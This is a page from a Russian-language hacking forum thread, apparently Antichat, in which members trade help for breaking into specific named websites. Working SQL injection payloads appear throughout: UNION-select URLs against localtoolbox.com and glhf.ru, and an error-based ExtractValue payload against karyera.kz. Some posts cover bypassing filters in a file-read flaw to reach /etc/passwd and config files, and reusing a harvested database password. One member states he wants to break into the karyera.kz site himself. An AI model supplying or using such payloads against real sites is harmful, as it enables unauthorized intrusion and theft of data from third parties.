Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1062 of 1207
  1. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    _ttp://www.localtoolbox.com/corporate/index.php ?cat_id=-9 3+union+select+1,2,3,4,5,6,7,8,9,10, 11--+
    Вроде всё верно делаю, а вот принтабильные поля никак не могу увидеть.
     
    #21221 GhostW, 19 Oct 2012
  2. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.localtoolbox.com/corporate/index.php?cat_id=-93'+union+select+1,2,3,version(),5,6,7,8,9,0,11--+
     
    #21222 Skofield, 19 Oct 2012
  3. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    странно, вроде как пробовал и так, но никакого результата... спасибо огромное. Очень оперативно отозвались
     
    #21223 GhostW, 19 Oct 2012
  4. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10

    Там аватары до 20 кб только грузить можна.
     
    #21224 Sat-hacker, 19 Oct 2012
  5. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Если нет вывода ошибки sql injection а сама sql присутствует как узнать сколько таблиц и т.д?
     
    #21225 Sat-hacker, 19 Oct 2012
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    зачем тебе вывод ошибки если нужно узнать количество таблиц? Оо

    если имеется ввиду количество колонок то

    order by, group by

    контент страницы должно менятся если запрос возвращает false
     
    _________________________
    #21226 Konqi, 19 Oct 2012
    Last edited: 19 Oct 2012
  7. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Какая-то странная инъекция ...
    http://www.glhf.ru/index.php?option=com_seyret&Itemid=105&catid=-1+union+select+0x313233--
     
    #21227 cipa21, 20 Oct 2012
  8. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    в LFI в запросах фильтруется <? и ?> как обойти?
    фильтрацию прошел проинклудил proc/self/environ
    php код просто написан и почему то не выполняется
     
    #21228 RazyKK, 20 Oct 2012
    Last edited: 20 Oct 2012
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    зачем тебе "<?" при LFI?
    ты уверен что это LFI а не обычная читалка?
     
    _________________________
    #21229 Konqi, 20 Oct 2012
  10. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    да там не include а file_get_contents. фильтруется etc , как можно обойти?
     
    #21230 RazyKK, 20 Oct 2012
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    что именно фильтруется? никогда не встречал такого чтоб фильтрировался слово "etc", если /etc/passwd, то попробуй /etc/какаятофигня/../passwd
     
    _________________________
    #21231 Konqi, 20 Oct 2012
  12. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    etc/любое слово - ошибка
     
    #21232 RazyKK, 20 Oct 2012
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ну поэксперементируй с кодированием, с хексом и тп
    попрубуй понять логику WAF. а сначала обясни зачем тебе нужен каталог /etc/ ?
     
    _________________________
    #21233 Konqi, 20 Oct 2012
  14. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    хекс попробовал, 0x...... не работает. конфиги посмотреть. нашел пасс от дб, пробовал удаленно подкл к sql не успешно
     
    #21234 RazyKK, 20 Oct 2012
  15. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Народ, как правильно заэкранировать хвост запроса в MySQL? так /* не получается, и так -- или так # тоже, хотя в запрос они и попадают, но парсер всё равно выполняет всё что идёт за ними... И пишет You have an error in your SQL syntax

    Запрос такой:

    Code:
    select * from (SELECT sector_id,sector_name , (select count(*) from tbl_jobs 
where status_cd='sENAB' and position_sector=s.sector_id and education_level=9; /* ) 
job_count FROM tbl_sectors s where lang_cd='RUS' order by order_id)a where a.job_count>0
     
    #21235 postscripter, 20 Oct 2012
    Last edited: 20 Oct 2012
  16. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    попробуй #
     
    #21236 RazyKK, 20 Oct 2012
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    RazyKK

    лучше скрипты изучи

    postscripter

    ссылку скинь, гадалки уже спят
     
    _________________________
    #21237 Konqi, 20 Oct 2012
    1 person likes this.
  18. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать :D

    Решётка тоже не прокатила. К сожалению...

    Code:
    POST /rabota_01.php HTTP/1.1
Host: www.karyera.kz
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 SF/2.09b
Range: bytes=0-399999
Referer: http://www.karyera.kz/
Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=&
    В урле слова типа Select фильтруются, поэтому только через post.
     
    #21238 postscripter, 20 Oct 2012
    Last edited: 20 Oct 2012
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://candidate.karyera.kz/search_01.php

    POST / p_Keyword='or(ExtractValue(1,concat(0x3a,version())))='1

    [​IMG]
     
    _________________________
    #21239 Konqi, 20 Oct 2012
    Last edited: 20 Oct 2012
  20. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Konqi, благодарствую, счас погляжу :)
     
    #21240 postscripter, 20 Oct 2012
(You must log in or sign up to post here.)
Page 1062 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.